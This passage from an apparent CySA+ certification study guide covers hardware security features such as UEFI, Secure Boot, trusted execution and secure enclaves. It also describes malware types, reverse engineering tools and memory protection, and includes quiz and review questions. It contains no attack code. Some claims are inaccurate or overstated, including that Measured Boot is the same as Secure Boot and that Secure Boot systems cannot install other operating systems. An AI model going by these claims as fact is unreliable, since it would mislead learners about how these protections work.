than the current firmware), then the bootloader will prevent
installation of the older firmware.
An eFuse can also be used to help secure a stolen device. For
example, the Samsung eFuse uses an eFuse to indicate when an
untrusted (non-Samsung) path is discovered. Once the eFuse is
set (when the path is discovered), the device cannot read the
data previously stored.
UNIFIED EXTENSIBLE FIRMWARE
INTERFACE (UEFI)
A computer’s BIOS contains the basic instruction that a
computer needs to boot and load the operating system from a
drive. The process of updating the BIOS with the latest software
is referred to as flashing the BIOS. Security professionals
should ensure that any BIOS updates are obtained from the
BIOS vendor and have not been tampered with in any way.
The traditional BIOS has been replaced with the Unified
Extensible Firmware Interface (UEFI). UEFI maintains
support for legacy BIOS devices, but is considered a more
advanced interface than traditional BIOS. BIOS uses the master
boot record (MBR) to save information about the hard drive
data, while UEFI uses the GUID partition table (GPT). BIOS
partitions were a maximum of 4 partitions, each being only 2
terabytes (TB). UEFI allows up to 128 partitions, with the total
disk limit being 9.4 zettabytes (ZB) or 9.4 billion terabytes.
UEFI is also faster and more secure than traditional BIOS. UEFI
Secure Boot requires boot loaders to have a digital signature.
UEFI is an open standard interface layer between the firmware
and the operating system that requires firmware updates to be
digitally signed. Security professionals should understand the
following points regarding UEFI:
Designed as a replacement for traditional PC BIOS.
Additional functionality includes support for Secure Boot, network
authentication, and universal graphics drivers.
Protects against BIOS malware attacks including rootkits.
Secure Boot requires that all boot loader components (e.g., OS
kernel, drivers) attest to their identity (digital signature) and
the attestation is compared to the trusted list. More on
Secure/Measured Boot and attestation will be covered later in
the “Measured Boot and Attestation” section.
When a computer is manufactured, a list of keys that identify
trusted hardware, firmware, and operating system loader code (and
in some instances, known malware) is embedded in the UEFI.
Ensures the integrity and security of the firmware.
Prevents malicious files from being loaded.
Can be disabled for backward compatibility.
UEFI operates between the OS layer and the firmware layer, as
shown in Figure 10-3.
Figure 10-3 UEFI
TRUSTED FOUNDRY
You must be concerned with the safety and the integrity of the
hardware that you purchase. The following are some of the
methods used to provide this assurance:
Trusted Foundry: The Trusted Foundry program can help you
exercise care in ensuring the authenticity and integrity of the
components of hardware purchased from a vendor. This U.S.
Department of Defense (DoD) program identifies “trusted vendors”
and ensures a “trusted supply chain.” A trusted supply chain begins
with trusted design and continues with trusted mask, foundry,
packaging/assembly, and test services. It ensures that systems have
access to leading-edge integrated circuits from secure, domestic
sources. At the time of this writing, 77 vendors have been certified
as trusted.
Source authenticity of hardware: When purchasing hardware
to support any network or security solution, a security professional
must ensure that the hardware’s authenticity can be verified. Just as
expensive consumer items such as purses and watches can be
counterfeited, so can network equipment. While the dangers with
counterfeit consumer items are typically confined to a lack of
authenticity and potentially lower quality, the dangers presented by
counterfeit network gear can extend to the presence of backdoors in
the software or firmware. Always purchase equipment directly from
the manufacturer when possible, and when purchasing from
resellers, use caution and insist on a certificate of authenticity. In
any case where the price seems too good to be true, keep in mind
that it may be an indication the gear is not authentic.
OEM documentation: One of the ways you can reduce the
likelihood of purchasing counterfeit equipment is to insist on the
inclusion of verifiable original equipment manufacturer (OEM)
documentation. In many cases, this paperwork includes anticounterfeiting features. Make sure to use the vendor website to
verify all the various identifying numbers in the documentation.
SECURE PROCESSING
Secure processing is a concept that encompasses a variety of
technologies to prevent any insecure actions on the part of the
CPU or processor. In some cases these technologies involve
securing the actions of the processor itself, while other
approaches tackle the issue where the data is stored. This
section introduces some of these technologies and approaches.
Trusted Execution
Trusted Execution (TE) is a collection of features that is used
to verify the integrity of the system and implement security
policies, which together can be used to enhance the trust level of
the complete system. An example is the Intel Trusted Execution
Technology (Intel TXT). This approach is shown in Figure 10-4.
FIGURE 10-4 Intel Trusted Execution Technology
Secure Enclave
A secure enclave is a part of an operating system that cannot
be compromised even when the operating system kernel is
compromised, because the enclave has its own CPU and is
separated from the rest of the system. This means security
functions remain intact even when someone has gained control
of the OS. Secure enclaves are a relatively recent technology
being developed to provide additional security. Cisco, Microsoft,
and Apple all have implementations of secure enclaves that
differ in implementation but all share the same goal of creating
an area that cannot be compromised even when the OS is.
Processor Security Extensions
Processor security extensions are sets of security-related
instruction codes that are built into some modern CPUs. An
example is Intel Software Guard Extensions (Intel SGX). It
defines private regions of memory, called enclaves, whose
contents are protected and unable to be either read or saved by
any process outside the enclave itself, including processes
running at higher privilege levels.
Another processor security technique is the use of the NX and
XN bits. These bits are related to processors. Their respective
meanings are as follows:
NX (no-execute) bit: Technology used in CPUs to segregate areas
of memory for use by either storage of processor instructions (code)
or storage of data
XN (never execute) bit: Method for specifying areas of memory
that cannot be used for execution
When these bits are available in the architecture of the system,
they can be used to protect sensitive information from memory
attacks. By utilizing the capability of the NX bit to segregate
memory into areas where storage of processor instructions
(code) and storage of data are kept separate, many attacks can
be prevented. Also, the capability of the XN bit to mark certain
areas of memory that are off-limits to execution of code can
prevent other memory attacks as well.
Atomic Execution
Atomic execution in concurrent programming are program
operations that run independently of any other processes
(threads). Making the operation atomic consists of using
synchronization mechanisms to make sure that the operation is
seen, from any other thread, as a single, atomic operation. This
increases security by preventing one thread from viewing the
state of the data when the first thread is still in the middle of the
operation. Atomicity also means that the operation of the thread
is either completely finished or is rolled back to its initial state
(there’s no such thing as partially done).
ANTI-TAMPER
Anti-tamper technology is designed to prevent access to
sensitive information and encryption keys on a device. Antitamper processors, for example, store and process private or
sensitive information, such as private keys or electronic money
credit. The chips are designed so that the information is not
accessible through external means and can be accessed only by
the embedded software, which should contain the appropriate
security measures, such as required authentication credentials.
Some of these chips take a different approach and zero out the
sensitive data if they detect penetration of their security, and
some can even do this with no power.
It also should not be possible for unauthorized persons to access
and change the configuration of any devices. This means
additional measures should be followed to prevent this.
Tampering includes defacing, damaging, or changing the
configuration of a device. Integrity verification programs should
be used by applications to look for evidence of data tampering,
errors, and omissions.
SELF-ENCRYPTING DRIVES
Self-encrypting drives do exactly as the name implies: they
encrypt themselves without any user intervention. The process
is so transparent to the user that the user may not even be
aware the encryption is occurring. It uses a unique and random
data encryption key (DEK). When data is written to the drive, it
is encrypted, and when the data is read from the drive, it is
decrypted, as shown in Figure 10-5.
Figure 10-5 Self-encrypting drive
TRUSTED FIRMWARE UPDATES
Hardware and firmware vulnerabilities are expected to become
an increasing target for sophisticated attackers. While typically
only successful when mounted by the skilled hands of a nationstate or advanced persistent threat (APT) group, an attack on
hardware and firmware can be devastating because this
firmware forms the platform for the entire device.
Firmware includes any type of instructions stored in nonvolatile memory devices such as read-only memory (ROM),
electrically erasable programmable read-only memory
(EPROM), or Flash memory. BIOS and UEFI code are the most
common examples for firmware. Computer BIOS doesn’t go
bad; however, it can become out of date or contain bugs. In the
case of a bug, an upgrade will correct the problem. An upgrade
may also be indicated when the BIOS doesn’t support some
component that you would like to install, such as a larger hard
drive or a different type of processor.
Today’s BIOS is typically written to an EEPROM chip and can
be updated through the use of software. Each manufacturer has
its own method for accomplishing this. Check out the
manufacturer’s documentation for complete details. Regardless
of the exact procedure used, the update process is referred to as
flashing the BIOS. It means the old instructions are erased from
the EEPROM chip, and the new instructions are written to the
chip. Firmware can be updated by using an update utility from
the motherboard vendor. In many cases, the steps are as
follows.
Step 1. Download the update file to a flash drive.
Step 2. Insert the flash drive and reboot the machine.
Step 3. Use the specified key sequence to enter the
UEFI/BIOS setup.
Step 4. If necessary, disable Secure Boot.
Step 5. Save the changes and reboot again.
Step 6. Re-enter the CMOS settings.
Step 7. Choose the boot options and boot from the flash
drive.
Step 8. Follow the specific directions with the update to
locate the upgrade file on the flash drive.
Step 9. Execute the file (usually by typing flash).
Step 10. While the update is completing, ensure that you
maintain power to the device.
The key to trusted firmware updates is contained in Step 1. Only
obtain firmware updates from the vendor directly. Never use a
third-party facilitator for this. Also make sure you verify the
hash value that comes along with the update to ensure that it
has not been altered since its creation.
MEASURED BOOT AND ATTESTATION
Attestation is the process of insuring or attesting to the fact that
a piece of software or firmware has integrity or that it has not
been altered from its original state. It is used in several boot
methods to check all elements used in the boot process to
ensure that malware has not altered the files or introduced new
files into the process. Let’s look at some of these Secure Boot
methods.
Measured Boot, also known as Secure Boot, is a term that
applies to several technologies that follow the Secure Boot
standard. Its implementations include Windows Secure Boot,
measured launch, and Integrity Measurement Architecture
(IMA). Figure 10-6 shows the three main actions related to
Secure Boot in Windows, which are described in the following
list:
1. The firmware verifies all UEFI executable files and the OS loader to
be sure they are trusted.
2. Windows boot components verify the signature on each component
to be loaded. Any untrusted components are not loaded and trigger
remediation.
3. The signatures on all boot-critical drivers are checked as part of
Secure Boot verification in Winload (Windows Boot Loader) and by
the Early Launch Anti-Malware driver.
Figure 10-6 Secure Boot
The disadvantage is that systems that ship with UEFI Secure
Boot enabled do not allow the installation of any other
operating system. This prevents installing any other operating
systems or running any live Linux media.
Measured Launch
A measured launch is a launch in which the software and
platform components have been identified, or “measured,”
using cryptographic techniques. The resulting values are used at
each boot to verify trust in those components. A measured
launch is designed to prevent attacks on these components
(system and BIOS code) or at least to identify when these
components have been compromised. It is part of Intel TXT.
TXT functionality is leveraged by software vendors including
HyTrust, PrivateCore, Citrix, and VMware.
An application of measured launch is Measured Boot by
Microsoft in Windows 10 and Windows Server 2019. It creates a
detailed log of all components that loaded before the antimalware. This log can be used to both identify malware on the
computer and maintain evidence of boot component tampering.
One possible disadvantage of measured launch is potential
slowing of the boot process.
Integrity Measurement Architecture
Another approach that attempts to create and measure the
runtime environment is an open source trusted computing
component called Integrity Measurement Architecture (IMA),
mentioned earlier in this chapter. IMA creates a list of
components and anchors the list to the TPM chip. It can use the
list to attest to the system’s runtime integrity.
BUS ENCRYPTION
The CPU is connected to an address bus. Memory and I/O
devices recognize this address bus. These devices can then
communicate with the CPU, read requested data, and send it to
the data bus. Bus encryption protects the data traversing
these buses. Bus encryption is used by newer Microsoft
operating systems to protect certificates, BIOS, passwords, and
program authenticity. Bus encryption is necessary not only to
prevent tampering of encrypted instructions that may be easily
discovered on a data bus or during data transmission, but also
to prevent discovery of decrypted instructions that may reveal
security weaknesses that an intruder can exploit.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 10-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 10-2 Key Topics in Chapter 10
Key Topic Element
Description
Page Number
Bulleted
list
Hardware RoTs
29
8
Bulleted
list
TPM contents
30
0
Figure 101
vTPM possible solution 1
301
Figure 102
vTPM possible solution 2
301
Bulleted
list
Functions of an HSM
30
2
Bulleted
list
Drawbacks to an HSM
30
2
Section
Security features of eFuse
30
3
Figure 103
UEFI operations
30
4
Bulleted
list
Methods used to provide hardware
assurance
30
5
Bulleted
list
NX and XN bits
30
7
Step list
Steps to updating firmware
30
9
Figure 106
Secure Boot
310
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
Roots of Trust (RoTs)
Trusted Platform Module (TPM)
virtual TPM (vTPM)
hardware security module (HSM)
microSD HSM
eFuse
Unified Extensible Firmware Interface (UEFI)
Secure Boot
attestation
Trusted Foundry
secure processing
Trusted Execution
secure enclave
processor security extensions
atomic execution
anti-tamper technology
self-encrypting drives
Measured Boot
bus encryption
REVIEW QUESTIONS
1. RoTs need to be exposed by the operating system to
applications through an open ___________.
2. List at least one of the contents of a TPM chip.
3. Match the following terms with their definitions.
Term
s
Definitions
Vir
tua
l
TP
M
An appliance that safeguards and manages digital keys
used with strong authentication and provides crypto
processing
HS
M
Allows for the dynamic real-time reprogramming of
computer chips
eF
use
A more advanced interface than traditional BIOS
UE
FI
A software object that performs the functions of a TPM
chip
4. _______________ requires that all boot loader
components (e.g., OS kernel, drivers) attest to their identity
(digital signature) and the attestation is compared to the
trusted list.
5. List the Intel example of the implementation of processor
security extensions.
6. Match the following terms with their definitions.
Terms
Definitions
Firm
ware
Using synchronization mechanisms to make sure that
the operation is seen, from any other thread, as a single
operation
Atom
ic
execu
tion
Any type of instructions stored in non-volatile memory
devices such as read-only memory (ROM)
Meas
ured
Boot
Used by newer Microsoft operating systems to protect
certificates, BIOS, passwords, and program authenticity
Bus
encry
ption
Process where the firmware verifies all UEFI executable
files and the OS loader to be sure they are trusted
7. _____________ creates a list of components and anchors
the list to the TPM chip. It can use the list to attest to the
system’s runtime integrity.
8. What is the disadvantage of systems that ship with UEFI
Secure Boot enabled?
9. Match the following terms with their definitions.
Terms
Definitions
NX bit
Used to encrypt self-encrypting drives
Rando
Method for specifying areas of memory that cannot be
m data
encrypt
ion key
(DEK)
used for execution
XN bit
A collection of features that is used to verify the
integrity of the system and implement security
policies, which together can be used to enhance the
trust level of the complete system
Trusted
Executi
on (TE)
Technology used in CPUs to segregate areas of
memory for use by either storage of processor
instructions (code) or storage of data
10. The traditional BIOS has been replaced with the
____________________.
Chapter 11
Analyzing Data as Part of
Security Monitoring
Activities
This chapter covers the following topics related to Objective 3.1
(Given a scenario, analyze data as part of security monitoring
activities) of the CompTIA Cybersecurity Analyst (CySA+) CS0002 certification exam:
Heuristics: Discusses how the heuristics process works.
Trend analysis: Covers the use of trend data.
Endpoint: Topics include malware, memory, system and
application behavior, file system, and user and entity behavior
analytics (UEBA).
Network: Covers URL and DNS analysis, flow analysis, and packet
and protocol analysis.
Log review: Includes event logs, Syslog, firewall logs, web
application firewall (WAF), proxy, and intrusion detection system
(IDS)/intrusion prevention system (IPS).
Impact analysis: Compares organization impact vs. localized
impact and immediate vs. total impact.
Security information and event management (SIEM)
review: Discusses rule writing, known-bad Internet Protocol (IP),
and the dashboard.
Query writing: Explains string search, scripting, and piping.
E-mail analysis: Examines malicious payload, DomainKeys
Identified Mail (DKIM), Domain-based Message Authentication,
Reporting, and Conformance (DMARC), Sender Policy Framework
(SPF), phishing, forwarding, digital signature, e-mail signature
block, embedded links, impersonation, and header.
Security monitoring activities generate a significant (maybe
even overwhelming) amount of data. Identifying what is
relevant and what is not requires that you not only understand
the various data formats that you encounter, but also recognize
data types and activities that indicate malicious activity. This
chapter explores the data analysis process.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these nine self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 11-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 11-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questio
n
Heuristics
1
Trend Analysis
2
Endpoint
3
Network
4
Log Review
5
Impact Analysis
6
Security Information and Event Management
(SIEM) Review
7
Query Writing
8
E-mail Analysis
9
1. Which of the following determines the susceptibility of a
system to a particular threat or risk using decision rules or
weighing methods?
1. Heuristics
2. Trend analysis
3. SPF
4. Regression analysis
2. Which of the following is not an example of utilizing trend
analysis?
1. An increase in the use of a SQL server, indicating the need to
increase resources on the server
2. The identification of threats based on behavior that typically
accompanies such threats
3. A cessation in traffic bound for a server providing legacy services,
indicating a need to decommission the server
4. An increase in password resets, indicating a need to revise the
password policy
3. Which of the following discusses implementing endpoint
protection platforms (EPPs)?
1. IEC 270017
2. FIPS 120
3. NIST SP 800-128
4. PCI DSS
4. Which of the following is a free online service for testing and
analyzing URLs, helping with identification of malicious
content on websites?
1. URLVoid
2. URLSec
3. SOA
4. urlQuery
5. Which of the following is a protocol that can be used to
collect logs from devices and store them in a central
location?
1. Syslog
2. DNSSec
3. URLQuery
4. SMTP
6. When you are determining what role the quality of the
response played in the severity of the issue, what type of
analysis are you performing?
1. Trend analysis
2. Impact analysis
3. Log analysis
4. Reverse engineering
7. Which type of SIEM rule is typically used in worm/malware
outbreak scenarios?
1. Cause and effect
2. Trending
3. Transitive or tracking
4. Single event
8. Which of the following is used to look within a log file or
data stream and locate any instances of a combination of
characters?
1. Script
2. Pipe
3. Transitive search
4. String search
9. Which of the following enables you to verify the source of an
e-mail by providing a method for validating a domain name
identity that is associated with a message through
cryptographic authentication?
1. DKIM
2. DNSSec
3. IPsec
4. AES
FOUNDATION TOPICS
HEURISTICS
When analyzing security data, sometimes it is difficult to see the
forest for the trees. Using scripts, algorithms, and other
processes to assist in looking for the information that really
matters makes the job much easier and ultimately more
successful.
Heuristics is a type of analysis that determines the
susceptibility of a system to a particular threat/risk by using
decision rules or weighing methods. Decision rules are preset to
allow the system to make decisions, and weighing rules are used
within the decision rules to enable the system to make value
judgments among options. Heuristics is often utilized by
antivirus software to identify threats that signature analysis
can’t discover because the threats either are too new to have
been analyzed (called zero-day threats) or are multipronged
attacks that are constructed in such a way that existing
signatures do not identify them.
Many IDS/IPS solutions also can use heuristics to identify
threats.
TREND ANALYSIS
In many cases, the sheer amount of security data that is
generated by the various devices located throughout our
environments makes it difficult to see what is going on. When
this same raw data is presented to us in some sort of visual
format, it becomes somewhat easier to discern patterns and
trends. Aggregating the data and graphing it makes spotting a
trend much easier.
Trend analysis focuses on the long-term direction in the
increase or decrease in a particular type of traffic or in a
particular behavior in the network. Some examples include the
following:
An increase in the use of a SQL server, indicating the need to
increase resources on the server
A cessation in traffic bound for a server providing legacy services,
indicating a need to decommission the server
An increase in password resets, indicating a need to revise the
password policy
Many vulnerability scanning tools include a preconfigured filter
for scan results that both organizes vulnerabilities found by
severity and charts the trend (up or down) for each severity
level.
For example, suppose you were interested in getting a handle on
the relative breakdown of security events between your
Windows devices and your Linux devices. Most tools that
handle this sort of thing can not only aggregate all events of a
certain type but graph them over time. Figure 11-1 shows
examples of such graphs.
Figure 11-1 Trend Analysis
ENDPOINT
Many of the dangers to our environments come through the
endpoints. Endpoint security is a field of security that attempts
to protect individual endpoints in a network by staying in
constant contact with these individual endpoints from a central
location. It typically works on a client/server model in that each
endpoint has software that communicates with the software on
the central server. The functionality provided can vary.
In its simplest form, endpoint security includes monitoring and
automatic updating and configuration of security patches and
personal firewall settings. In more advanced systems, endpoint
security might include examination of the system each time it
connects to the network. This examination would ensure that all
security patches are up to date. In even more advanced
scenarios, endpoint security could automatically provide
remediation to the computer by installing missing security
patches. In either case, the computer would not be allowed to
connect to the network until the problem is resolved, either
manually or automatically. Other measures include using device
or drive encryption, enabling remote management capabilities
(such as remote wipe and remote locate), and implementing
device ownership policies and agreements so that the
organization can manage or seize the device.
Endpoint security can mitigate issues such as the following:
Malware of all types
Data exfiltration
NIST SP 800-128 discusses implementing endpoint
protection platforms (EPPs). According to NIST SP 800-128,
endpoints (that is, laptops, desktops, mobile devices) are a
fundamental part of any organizational system. Endpoints are
an important source of connecting end users to networks and
systems, and are also a major source of vulnerabilities and a
frequent target of attackers looking to penetrate a network. User
behavior is difficult to control and hard to predict, and user
actions, whether clicking on a link that executes malware or
changing a security setting to improve the usability of the
endpoint, frequently allow exploitation of vulnerabilities.
Commercial vendors offer a variety of products to improve
security at the endpoints of a network. These EPPs include the
following:
Anti-malware: Anti-malware applications are part of the common
secure configurations for system components. Anti-malware
software employs a wide range of signatures and detection schemes,
automatically updates signatures, disallows modification by users,
runs scans on a frequently scheduled basis, has an auto-protect
feature set to scan automatically when a user action is performed
(for example, opening or copying a file), and may provide
protection from zero-day attacks. For platforms for which antimalware software is not available, other forms of anti-malware such
as rootkit detectors may be employed.
Personal firewalls: Personal firewalls provide a wide range of
protection for host machines including restriction on ports and
services, control against malicious programs executing on the host,
control of removable devices such as USB devices, and auditing and
logging capability.
Host-based intrusion detection and prevention system
(IDPS): Host-based IDPS is an application that monitors the
characteristics of a single host and the events occurring within that
host to identify and stop suspicious activity. This is distinguished
from a network-based IDPS, which is an intrusion detection and
prevention system that monitors network traffic for particular
network segments or devices and analyzes the network and
application protocol activity to identify and stop suspicious activity.
Restrict the use of mobile code: Organizations should exercise
caution in allowing the use of mobile code such as ActiveX, Java,
and JavaScript. An attacker can easily attach a script to a URL in a
web page or e-mail that, when clicked, executes malicious code
within the computer’s browser.
Security professionals may also want to read NIST SP 800-111,
which provides guidance to storage encryption technologies for
end-user devices. In addition, NIST provides checklists for
implementing different operating systems according to the U.S.
Government Configuration Baseline (USGCB).
Malware
Malicious software (or malware) is any software that harms a
computer, deletes data, or takes actions the user did not
authorize. It includes a wide array of malware types, including
ones you have probably heard of such as viruses, and many you
might not have heard of, but of which you should be aware. The
malware that you need to understand includes the following:
Virus
Boot sector virus
Parasitic virus
Stealth virus
Polymorphic virus
Macro virus
Multipartite virus
Worm
Trojan horse
Logic bomb
Spyware/adware
Botnet
Rootkit
Ransomware
Virus
A virus is a self-replicating program that infects software. It
uses a host application to reproduce and deliver its payload and
typically attaches itself to a file. It differs from a worm in that it
usually requires some action on the part of the user to help it
spread to other computers. The following list briefly describes
various virus types:
Boot sector: This type of virus infects the boot sector of a
computer and either overwrites files or installs code into the sector
so that the virus initiates at startup.
Parasitic: This type of virus attaches itself to a file, usually an
executable file, and then delivers the payload when the program is
used.
Stealth: This type of virus hides the modifications that it is making
to the system to help avoid detection.
Polymorphic: This type of virus makes copies of itself, and then
makes changes to those copies. It does this in hopes of avoiding
detection from antivirus software.
Macro: This type of virus infects programs written in Word, Basic,
Visual Basic, or VBScript that are used to automate functions.
Macro viruses infect Microsoft Office files and are easy to create
because the underlying language is simple and intuitive to apply.
They are especially dangerous in that they infect the operating
system itself. They also can be transported between different
operating systems because the languages are platform independent.
Multipartite: Originally, these viruses could infect both program
files and boot sectors. This term now means that the virus can infect
more than one type of object or can infect in more than one way.
File or system infector: File infectors infect program files, and
system infectors infect system program files.
Companion: This type of virus does not physically touch the target
file. It is also referred to as a spawn virus.
E-mail: This type of virus specifically uses an e-mail system to
spread itself because it is aware of the e-mail system functions.
Knowledge of the functions allows this type of virus to take
advantage of all e-mail system capabilities.
Script: This type of virus is a stand-alone file that can be executed
by an interpreter.
Worm
A worm is a type of malware that can spread without the
assistance of the user. It is a small program that, like a virus, is
used to deliver a payload. One way to help mitigate the effects of
worms is to place limits on sharing, writing, and executing
programs.
Trojan Horse
A Trojan horse is a program or rogue application that appears
to or is purported to do one thing but actually does another
when executed. For example, what appears to be a screensaver
program might really be a Trojan horse. When the user
unwittingly uses the program, it executes its payload, which
could be to delete files or create backdoors. Backdoors are
alternative ways to access the computer undetected in the
future.
One type of Trojan targets and attempts to access and make use
of smart cards. A countermeasure to prevent this attack is to use
“single-access device driver” architecture. Using this approach,
the operating system allows only one application to have access
to the serial device (and thus the smart card) at any given time.
Another way to prevent the attack is by using a smart card that
enforces a “one private key usage per PIN entry” policy model.
In this model, the user must enter her PIN every single time the
private key is used, and therefore the Trojan horse would not
have access to the key.
Logic Bomb
A logic bomb is a type of malware that executes when a
particular event takes place. For example, that event could be a
time of day or a specific date or it could be the first time you
open notepad.exe. Some logic bombs execute when forensics are
being undertaken, and in that case the bomb might delete all
digital evidence.
Spyware/Adware
Adware doesn’t actually steal anything, but it tracks your
Internet usage in an attempt to tailor ads and junk e-mail to
your interests. Spyware also tracks your activities and can also
gather personal information that could lead to identity theft. In
some cases, spyware can even direct the computer to install
software and change settings.
Botnet
A bot is a type of malware that installs itself on large numbers of
computers through infected e-mails, downloads from websites,
Trojan horses, and shared media. After it’s installed, the bot has
the ability to connect back to the hacker’s computer. After that,
the hacker’s server controls all the bots located on these
machines. At a set time, the hacker might direct the bots to take
some action, such as direct all the machines to send out spam
messages, mount a DoS attack, or perform phishing or any
number of malicious acts. The collection of computers that act
together is called a botnet, and the individual computers are
called zombies. The attacker that manages the botnet is often
referred to as the botmaster. Figure 11-2 shows this
relationship.
FIGURE 11-2 Botnet
Rootkit
A rootkit is a set of tools that a hacker can use on a computer
after he has managed to gain access and elevate his privileges to
administrator. It gets its name from the root account, the most
powerful account in Unix-based operating systems. The rootkit
tools might include a backdoor for the hacker to access. This is
one of the hardest types of malware to remove, and in many
cases only a reformat of the hard drive will completely remove
it. The following are some of the actions a rootkit can take:
Install a backdoor
Remove all entries from the security log (log scrubbing)
Replace default tools with compromised versions (Trojaned
programs)
Make malicious kernel changes
Ransomware
Ransomware is malware that prevents or limits users from
accessing their systems. It is called ransomware because it
forces its victims to pay a ransom through certain online
payment methods to be given access to their systems again or to
get their data back.
Reverse Engineering
Reverse engineering is a term that has been around for
some time. Generically, it means taking something apart to
discover how it works and perhaps to replicate it. In
cybersecurity, it is used to analyze both hardware and software
and for various other reasons, such as to do the following:
Discover how malware functions
Determine whether malware is present in software
Locate software bugs
Locate security problems in hardware
The following sections look at the role of reverse engineering in
cybersecurity analysis.
Isolation/Sandboxing
When conducting reverse engineering, how can you analyze
malware without suffering the effects of the malware? The
answer is to place the malware where you can safely probe and
analyze it. This is done by isolating, or sandboxing, the
malware. This process is covered more fully in the “Sandboxing”
section of Chapter 12, “Implementing Configuration Changes to
Existing Controls to Improve Security.”
Software/Malware
Software of any type can be checked for integrity to ensure that
it has not been altered since its release. Checking for integrity is
one of the ways you can tell when a file has been corrupted (or
perhaps replaced entirely) with malware. Two main methods
are used in this process:
Fingerprinting/hashing: Fingerprinting, or hashing, is the
process of using a hashing algorithm to reduce a large document or
file to a character string that can be used to verify the integrity of
the file (that is, whether the file has changed in any way). To be
useful, a hash value must have been computed at a time when the
software or file was known to have integrity (for example, at release
time). At any time thereafter, the software file can be checked for
integrity by calculating a new hash value and comparing it to the
value from the initial calculation. If the character strings do not
match, a change has been made to the software.
Fingerprinting/hashing has been used for some time to verify the
integrity of software downloads from vendors. The vendor provides
the hash value and specifies the hash algorithm, and the customer
recalculates the hash value after the download. If the result matches
the value from the vendor, the customer knows the software has
integrity and is safe.
Anti-malware products also use this process to identify malware.
The problem is that malware creators know this, and so they are
constantly making small changes to malicious code to enable the
code to escape detection through the use of hashes or signatures.
When they make a small change, anti-malware products can no
longer identify the malware, and they won’t be able to until a new
hash or signature is created by the anti-malware vendor. For this
reason, some vendors are beginning to use “fuzzy” hashing, which
looks for hash values that are similar but not exact matches.
Decomposition: Decomposition is the process of breaking
something down to discover how it works. When applied to
software, it is the process of discovering how the software works,
perhaps who created it, and, in some cases, how to prevent the
software from performing malicious activity.
When used to assess malware, decomposition can be done two
ways: statically and dynamically. When static or manual analysis is
used, it takes hours per file and uses tools called disassemblers.
Advanced expertise is required. Time is often wasted on repetitive
sample unpacking and indicator extraction tasks.
With dynamic analysis tools, an automated static analysis engine is
used to identify, de-archive, de-obfuscate, and unpack the
underlying object structure. Then proactive threat indicators (PTIs)
are extracted from the unpacked files. A rules engine classifies the
results to calculate the threat level and to route the extracted files
for further analysis. Finally, the extracted files are repaired to
enable further extraction or analysis with a sandbox, decompiler, or
debugger. While the end result may be the same, these tools are
much faster and require less skill than manual or static analysis.
Reverse Engineering Tools
When examples of zero-day malware have been safely
sandboxed and must be analyzed or when a host has been
compromised and has been safely isolated and you would like to
identify details of the breach to be better prepared for the
future, reverse engineering tools are indicated. The Infosec
Institute recommends the following as the top reverse
engineering tools for cybersecurity professionals (as of January
2019):
Apktool: This third-party tool for reverse engineering can decode
resources to nearly original form and re-create them after making
some adjustments.
dex2jar: This lightweight API is designed to read the Dalvik
Executable (.dex/.odex) format. It is used with Android and Java
.class files.
diStorm3: This tool is lightweight, easy to use, and has a fast
decomposer library. It disassembles instructions in 16-, 32-, and
64-bit modes. It is also the fastest disassembler library. The source
code is very clean, readable, portable, and platform independent.
edb-debugger: This is the Linux equivalent of the famous OllyDbg
debugger on the Windows platform. One of the main goals of this
debugger is modularity.
Jad Debugger: This is the most popular Java decompiler ever
written. It is a command-line utility written in C++.
Javasnoop: This Aspect Security tool allows security testers to test
the security of Java applications easily.
OllyDbg: This is a 32-bit, assembler-level analyzing debugger for
Microsoft Windows. Emphasis on binary code analysis makes it
particularly useful in cases where the source is unavailable.
Valgrind: This suite is for debugging and profiling Linux
programs.
Memory
A computing system needs somewhere to store information,
both on a long-term basis and a short-term basis. There are two
types of storage locations: memory, for temporary storage
needs, and long-term storage media. Information can be
accessed much faster from memory than from long-term
storage, which is why the most recently used instructions or
information is typically kept in cache memory for a short period
of time, which ensures the second and subsequent accesses will
be faster than returning to long-term memory. Computers can
have both random-access memory (RAM) and read-only
memory (ROM). RAM is volatile, meaning the information must
continually be refreshed and will be lost if the system shuts
down.
Memory Protection
In an information system, memory and storage are the most
important resources. Damaged or corrupt data in memory can
cause the system to stop functioning. Data in memory can be
disclosed and therefore must be protected. Memory does not
isolate running processes and threads from data. Security
professionals must use processor states, layering, process
isolation, abstraction, hardware segmentation, and data hiding
to help keep data isolated.
Most processors support two processor states: supervisor state
(or kernel mode) and problem state (or user mode). In
supervisor state, the highest privilege level on the system is used
so that the processor can access all the system hardware and
data. In problem state, the processor limits access to system
hardware and data. Processes running in supervisor state are
isolated from the processes that are not running in that state;
supervisor-state processes should be limited to only core
operating system functions.
A security professional can use layering to organize
programming into separate functions that interact in a
hierarchical manner. In most cases, each layer only has access
to the layers directly above and below it. Ring protection is the
most common implementation of layering, with the inner ring
(ring 0) being the most privileged ring and the outer ring (ring
3) being the lowest privileged. The OS kernel usually runs on
ring 0, and user applications usually run on ring 3.
A security professional can isolate processes by providing
memory address spaces for each process. Other processes are
unable to access address space allotted to another process.
Naming distinctions and virtual mapping are used as part of
process isolation.
Hardware segmentation works like process isolation. It prevents
access to information that belongs to a higher security level.
However, hardware segmentation enforces the policies using
physical hardware controls rather than the operating system’s
logical process isolation. Hardware segmentation is rare and is
usually restricted to governmental use, although some
organizations may choose to use this method to protect private
or confidential data. Data hiding prevents data at one security
level from being seen by processes operating at other security
levels.
Secured Memory
Memory can be divided into multiple partitions. Based on the
nature of data in a partition, the partition can be designated as a
security-sensitive or a non-security-sensitive partition. In a
security breach (such as tamper detection), the contents of a
security-sensitive partition can be erased by the controller itself,
while the contents of the non-security-sensitive partition can
remain unchanged (see Figure 11-3).
